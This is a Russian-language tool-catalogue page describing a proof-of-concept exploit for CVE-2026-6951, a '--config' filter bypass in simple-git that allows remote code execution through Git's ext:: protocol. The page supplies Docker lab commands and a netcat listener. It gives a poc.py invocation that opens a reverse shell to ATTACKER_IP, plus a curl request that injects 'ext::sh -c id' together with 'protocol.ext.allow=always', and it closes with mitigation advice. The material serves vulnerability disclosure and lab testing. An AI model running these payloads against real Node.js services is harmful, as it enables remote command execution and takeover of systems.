Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6951 — Эксплойт proof-of-concept для CVE-2026-6951 — обход фильтра `--config` в simple-git, позволяющий выполнить удалённый код через протокол Git ext, с Docker-лабораторией и полезной нагрузкой reverse shell. | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2026-6951
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

Эксплойт proof-of-concept для CVE-2026-6951 — обход фильтра `--config` в simple-git, позволяющий выполнить удалённый код через протокол Git ext, с Docker-лабораторией и полезной нагрузкой reverse shell.

Репозиторий
111 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-6951 Удалённое выполнение кода в simple-git

★ CVE-2026-6951 Обход фильтра опции --config в simple-git, приводящий к RCE — PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


Обзор

CVE-2026-6951 — это уязвимость удалённого выполнения кода в simple-git, вызванная неполным исправлением CVE-2022-25912. Хотя опция -c была заблокирована, эквивалентная опция --config не была должным образом ограничена. Злоумышленник, способный контролировать аргументы Git, может включить протокол ext и выполнить произвольные команды через URL репозитория ext::.


Уязвимые версии

КатегорияВерсия
Уязвимыеsimple-git версии до 3.36.0
Исправленныеsimple-git 3.36.0 или новее

В данной среде используется simple-git 3.35.2 и @simple-git/argv-parser 1.0.3.


Воздействие

  • Удалённое выполнение кода с привилегиями приложения Node.js
  • Раскрытие конфиденциальных файлов
  • Получение обратной оболочки
  • Изменение или удаление данных приложения

Окружение

Соберите и запустите уязвимую среду.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

Доступ к сервису:

http://127.0.0.1:9107

Проверьте состояние сервиса.

curl -s http://127.0.0.1:9107/api/health

Встроенный пример репозитория доступен по адресу:

file:///srv/git/sample.git

PoC

Запустите слушатель на системе атакующего.

nc -lvnp 4444

Запустите скрипт эксплойта.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

Следующий запрос выполняет команду id, злоупотребляя неограниченной опцией --config и протоколом Git ext.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

Меры защиты

  • Обновите simple-git до версии 3.36.0 или новее.
  • Не передавайте контролируемые пользователем опции Git напрямую в simple-git.
  • Разрешайте только доверенные схемы URL репозиториев и отклоняйте URL ext::.
  • Применяйте строгую проверку по белому списку для URL репозиториев и аргументов Git.

Анализ

  • KR:
  • EN:
Скачать инструмент